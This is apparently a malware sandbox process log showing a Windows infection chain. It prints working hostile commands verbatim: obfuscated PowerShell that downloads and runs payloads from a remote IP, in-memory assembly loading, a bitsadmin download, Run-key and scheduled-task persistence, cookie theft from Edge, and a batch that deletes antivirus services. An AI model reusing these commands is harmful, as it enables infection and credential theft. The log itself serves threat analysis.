C:\Users\Admin\Documents\bV51xpcQbneJHY7GGPOoCNMB.exe
3⤵
PID:5796

C:\Users\Admin\Documents\bV51xpcQbneJHY7GGPOoCNMB.exe
C:\Users\Admin\Documents\bV51xpcQbneJHY7GGPOoCNMB.exe
3⤵
PID:5876

C:\Users\Admin\Documents\bV51xpcQbneJHY7GGPOoCNMB.exe
C:\Users\Admin\Documents\bV51xpcQbneJHY7GGPOoCNMB.exe
3⤵
PID:5908

C:\Users\Admin\Documents\bV51xpcQbneJHY7GGPOoCNMB.exe
C:\Users\Admin\Documents\bV51xpcQbneJHY7GGPOoCNMB.exe
3⤵
PID:5948

C:\Users\Admin\Documents\ZjXPy03ZyMBg4NaWiP53nV9i.exe
"C:\Users\Admin\Documents\ZjXPy03ZyMBg4NaWiP53nV9i.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2632

C:\Users\Admin\AppData\Roaming\6329272.exe
"C:\Users\Admin\AppData\Roaming\6329272.exe"
3⤵
PID:2404

C:\Users\Admin\AppData\Roaming\4462447.exe
"C:\Users\Admin\AppData\Roaming\4462447.exe"
3⤵
PID:4664

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
4⤵
PID:5732

C:\Users\Admin\AppData\Roaming\7140903.exe
"C:\Users\Admin\AppData\Roaming\7140903.exe"
3⤵
PID:5180

C:\Users\Admin\AppData\Roaming\6555998.exe
"C:\Users\Admin\AppData\Roaming\6555998.exe"
3⤵
PID:4128

C:\Users\Admin\Documents\VlUK18HKZY2z7RGvi4jt9Btg.exe
"C:\Users\Admin\Documents\VlUK18HKZY2z7RGvi4jt9Btg.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4108

C:\Users\Admin\Documents\gxAhyHm5e53G3khUNI2WHNvw.exe
"C:\Users\Admin\Documents\gxAhyHm5e53G3khUNI2WHNvw.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4100

C:\Users\Admin\Documents\J8ItzY46z87Ncj8CgFwUAvPe.exe
"C:\Users\Admin\Documents\J8ItzY46z87Ncj8CgFwUAvPe.exe"
2⤵
- Executes dropped EXE
PID:2608

C:\Users\Admin\Documents\J8ItzY46z87Ncj8CgFwUAvPe.exe
"C:\Users\Admin\Documents\J8ItzY46z87Ncj8CgFwUAvPe.exe"
3⤵
PID:6836

C:\Users\Admin\Documents\UQ98lgbhxp4lsxi8ZL7_1kFc.exe
"C:\Users\Admin\Documents\UQ98lgbhxp4lsxi8ZL7_1kFc.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2392

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
3⤵
- Executes dropped EXE
PID:5072

C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
3⤵
- Executes dropped EXE
PID:3920

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:5692

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:5056

C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
3⤵
PID:5044

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:4340

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:4920

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:4696

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:5004

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:2708

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:3364

C:\Users\Admin\Documents\xp3mHcdLtImf6VJREk8CgMcU.exe
"C:\Users\Admin\Documents\xp3mHcdLtImf6VJREk8CgMcU.exe"
2⤵
- Executes dropped EXE
PID:2052

C:\Users\Admin\Documents\ra3wCNQNgLlVAScREtS1CvQU.exe
"C:\Users\Admin\Documents\ra3wCNQNgLlVAScREtS1CvQU.exe"
2⤵
- Executes dropped EXE
PID:3964

C:\Users\Admin\AppData\Local\Temp\J8VlX82cVB.exe
"C:\Users\Admin\AppData\Local\Temp\J8VlX82cVB.exe"
3⤵
PID:2828

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
4⤵
- Creates scheduled task(s)
PID:4380

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\ra3wCNQNgLlVAScREtS1CvQU.exe"
3⤵
PID:1028

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:4688

C:\Users\Admin\Documents\7knkrgEiWvE9h5CLtmtxkW1T.exe
"C:\Users\Admin\Documents\7knkrgEiWvE9h5CLtmtxkW1T.exe"
2⤵
- Executes dropped EXE
PID:1408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 676
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 708
3⤵
- Program crash
PID:4720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 720
3⤵
- Program crash
PID:5920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 1120
3⤵
- Program crash
PID:4116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 1152
3⤵
- Program crash
PID:5964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 1196
3⤵
- Program crash
PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 1240
3⤵
- Executes dropped EXE
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "7knkrgEiWvE9h5CLtmtxkW1T.exe" /f & erase "C:\Users\Admin\Documents\7knkrgEiWvE9h5CLtmtxkW1T.exe" & exit
3⤵
PID:5808

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "7knkrgEiWvE9h5CLtmtxkW1T.exe" /f
4⤵
- Kills process with taskkill
PID:2748

C:\Users\Admin\Documents\NPZFrIefelB6sBQNQWP_LKBD.exe
"C:\Users\Admin\Documents\NPZFrIefelB6sBQNQWP_LKBD.exe"
2⤵
- Executes dropped EXE
PID:2660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 664
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 684
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 732
3⤵
- Program crash
PID:3284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 668
3⤵
- Program crash
PID:5620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1160
3⤵
- Program crash
PID:4920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1112
3⤵
- Program crash
PID:5988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1148
3⤵
- Program crash
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1208
3⤵
- Program crash
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1264
3⤵
- Program crash
PID:4604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1256
3⤵
- Program crash
PID:6048

C:\Users\Admin\Documents\iPsxVMBE73ZO82SZf1wBmAF6.exe
"C:\Users\Admin\Documents\iPsxVMBE73ZO82SZf1wBmAF6.exe"
2⤵
PID:2644

C:\Users\Admin\Documents\iPsxVMBE73ZO82SZf1wBmAF6.exe
C:\Users\Admin\Documents\iPsxVMBE73ZO82SZf1wBmAF6.exe
3⤵
- Executes dropped EXE
PID:4268

C:\Users\Admin\Documents\ppxDDFjTf3nUIwbiUiAklr8a.exe
"C:\Users\Admin\Documents\ppxDDFjTf3nUIwbiUiAklr8a.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2488

C:\Users\Admin\Documents\_fq6YP3D659a_PgfU09uTrV2.exe
"C:\Users\Admin\Documents\_fq6YP3D659a_PgfU09uTrV2.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4188

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8EBB.tmp\tempfile.ps1"
3⤵
PID:5124

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8EBB.tmp\tempfile.ps1"
3⤵
PID:5020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8EBB.tmp\tempfile.ps1"
3⤵
PID:5756

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8EBB.tmp\tempfile.ps1"
3⤵
PID:208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8EBB.tmp\tempfile.ps1"
3⤵
PID:6424

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8EBB.tmp\tempfile.ps1"
3⤵
PID:6588

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8EBB.tmp\tempfile.ps1"
3⤵
PID:6860

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
3⤵
- Download via BitsAdmin
PID:6448

C:\Users\Admin\Documents\Rg76RQIE0SGDsJfMBG6aiirs.exe
"C:\Users\Admin\Documents\Rg76RQIE0SGDsJfMBG6aiirs.exe"
2⤵
PID:1824

C:\Users\Admin\AppData\Local\Temp\is-EBRC6.tmp\Rg76RQIE0SGDsJfMBG6aiirs.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EBRC6.tmp\Rg76RQIE0SGDsJfMBG6aiirs.tmp" /SL5="$70058,138429,56832,C:\Users\Admin\Documents\Rg76RQIE0SGDsJfMBG6aiirs.exe"
3⤵
PID:5092

C:\Users\Admin\AppData\Local\Temp\2972.exe
C:\Users\Admin\AppData\Local\Temp\2972.exe
1⤵
PID:3204

C:\Users\Admin\AppData\Local\Temp\2EF1.exe
C:\Users\Admin\AppData\Local\Temp\2EF1.exe
1⤵
PID:4852

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
2⤵
PID:5692

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
3⤵
PID:644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
3⤵
PID:2372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
PID:6152

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" 